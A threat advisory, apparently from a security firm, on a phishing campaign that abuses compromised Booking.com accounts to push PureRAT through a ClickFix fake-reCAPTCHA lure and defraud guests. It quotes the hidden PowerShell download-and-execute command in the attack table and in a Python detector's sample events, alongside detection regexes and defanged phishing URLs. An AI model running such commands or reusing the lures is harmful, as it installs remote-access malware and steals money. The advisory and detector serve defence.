Sophisticated Phishing Campaign Targets Booking.com Hotels and Guests


This campaign targets hotel partners and guests through compromised Booking[.]com accounts. The threat actors run phishing and malware campaigns via malicious emails and WhatsApp messages that carry legitimate reservation details, which makes the messages far more credible. The end goal is to steal credentials, deploy malware (PureRAT), and commit financial fraud.

Severity: High

Threat Details

Phase 1: Initial Compromise of Hotel Systems

| Step | Description | Mechanism |
|---|---|---|
| Initial Lure | The attack begins with a malicious email sent to a hotel's reservation or administration address, often from another compromised, legitimate corporate account. The email impersonates Booking.com and refers to a customer request, such as a "New last-minute booking". | Spear-phishing |
| Redirection Chain | The email contains a URL (e.g., hxxps://{randomname}[.]com/[a-z0-9]{4}) that passes through a Traffic Distribution System (TDS), concealing the final malicious infrastructure. | TDS infrastructure |
| ClickFix Tactic | The victim lands on a page impersonating the Booking[.]com extranet/admin interface that presents a fake reCAPTCHA challenge: the ClickFix social engineering tactic. | Social engineering |
| Malware Execution | The victim is prompted to copy and execute a disguised PowerShell command (e.g., powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -Command "iex ((New-Object Net.WebClient).DownloadString('…'))"). | PowerShell abuse |
| Final Payload | The command downloads and executes a script that installs PureRAT, typically using DLL side-loading and persistence mechanisms (Run keys, Startup folder shortcuts). The core goal is to steal credentials that give access to guest data. | PureRAT (Remote Access Trojan) |

Phase 2: Fraud Targeting Customers

| Aspect | Details |
|---|---|
| Fraudulent Contact | Customers are contacted directly via WhatsApp or email. The messages contain legitimate reservation details (personal identifiers and dates) taken from the stolen hotel data, which significantly increases their credibility. |
| Phishing Lure | The message falsely claims that a security issue occurred with the customer's banking details during verification and urges them to "confirm their information" to prevent cancellation of the reservation, citing a fake "Booking new policy". |
| Phishing Page | The victim is directed to a URL (e.g., https[:]//guestverifiy5313-booking[.]com/6712 2859). The page is protected by Cloudflare Turnstile and mimics the Booking[.]com layout in order to harvest banking information. |
| Outcome | The customer is defrauded, effectively paying for the reservation a second time, which gives the campaign its name, "I Paid Twice". |

Recommendations

  1. Train staff to recognize spear-phishing attempts that impersonate customer inquiries or official Booking[.]com messages.
    Specifically warn against clicking links or, most critically, copying and executing commands disguised as security checks (like the ClickFix reCAPTCHA tactic).
    Emphasize that legitimate platforms like Booking[.]com will never ask an administrator to execute a PowerShell script to view a reservation or a message.
  2. Mandate MFA for all professional accounts that access booking platforms (Booking[.]com, Expedia, Airbnb, etc.).
  3. Treat any message (email or WhatsApp) claiming a payment issue with extreme caution, even if it contains legitimate reservation details.
  4. Never click a link in an unexpected message to “verify” or “update” banking information.
  5. Monitor for PowerShell scripts that download content from external URLs, particularly those using Invoke-WebRequest or Invoke-Expression.
  6. Monitor for outbound TCP/TLS connections on uncommon ports (56001–56003), which PureRAT uses for encrypted C2 communications, and correlate them with new process executions.
  7. Monitor for unusual creation of persistence mechanisms (Run registry keys and .lnk files in the Startup folder).
  8. Monitor for anomalous process execution chains, such as AddInProcess32.exe being launched by an executable in the AppData directory or initiating unexpected network connections.
  9. Block the IOCs at their respective controls:
    https://www.virustotal.com/gui/collection/254adcf653d8f660740d1c40f264085a4f2b106e13d762ccb5a14e1c6737fbd6/iocs
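As an added illustration of recommendations 5 through 8 (this is not code from the advisory or from Ampcus Cyber), the following Python applies those monitoring rules to constructed, Sysmon-style events; the event shape, field names, user name and file paths are assumptions, and the benign events show what must not fire.

```python
import re
from typing import Dict, List

# Constructed, simplified Sysmon-style events (assumed shape; not telemetry from the advisory).
SAMPLE_EVENTS: List[Dict] = [
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -Command "
                "\"iex ((New-Object Net.WebClient).DownloadString('https://example.invalid/a'))\""},
    {"type": "process", "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe",
     "parent": r"C:\Users\frontdesk\AppData\Roaming\update\svc.exe", "cmdline": "AddInProcess32.exe"},
    {"type": "network", "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe",
     "protocol": "tcp", "dst_port": 56002},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "value": r"C:\Users\frontdesk\AppData\Roaming\update\svc.exe"},
    {"type": "file", "path": r"C:\Users\frontdesk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    # Benign event that must not fire: PowerShell without any download/execute primitive.
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmdline": "powershell -NoProfile -Command Get-Date"},
]

# Download/execute primitives named in the advisory (Invoke-WebRequest, Invoke-Expression, their
# aliases) plus the WebClient.DownloadString pattern seen in the ClickFix command.
PS_DOWNLOAD = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-Expression|\biex\b", re.I)
PS_URL = re.compile(r"https?://", re.I)
PURERAT_PORTS = range(56001, 56004)                         # 56001-56003 per the advisory
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)
STARTUP_LNK = re.compile(r"\\Startup\\[^\\]+\.lnk$", re.I)


def detect(events: List[Dict]) -> List[Dict]:
    """Return one finding per event that matches one of the advisory's monitoring rules."""
    findings = []
    for ev in events:
        t, image = ev.get("type"), ev.get("image", "").lower()
        if t == "process" and image.endswith("powershell.exe"):
            cmd = ev.get("cmdline", "")
            if PS_DOWNLOAD.search(cmd) and PS_URL.search(cmd):          # recommendation 5
                findings.append({"rule": "powershell_remote_download", "event": ev})
        if t == "process" and image.endswith("addinprocess32.exe") \
                and "\\appdata\\" in ev.get("parent", "").lower():      # recommendation 8
            findings.append({"rule": "addinprocess32_from_appdata", "event": ev})
        if t == "network" and ev.get("protocol") == "tcp" and ev.get("dst_port") in PURERAT_PORTS:
            findings.append({"rule": "purerat_c2_port", "event": ev})   # recommendation 6
        if t == "registry" and RUN_KEY.search(ev.get("key", "")):         # recommendation 7
            findings.append({"rule": "run_key_persistence", "event": ev})
        if t == "file" and STARTUP_LNK.search(ev.get("path", "")):        # recommendation 7
            findings.append({"rule": "startup_lnk_persistence", "event": ev})
    return findings
```

In production the network rule would be correlated with the process-creation event for the same image, as recommendation 6 suggests, rather than fired on the port alone.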

Ampcus Cyber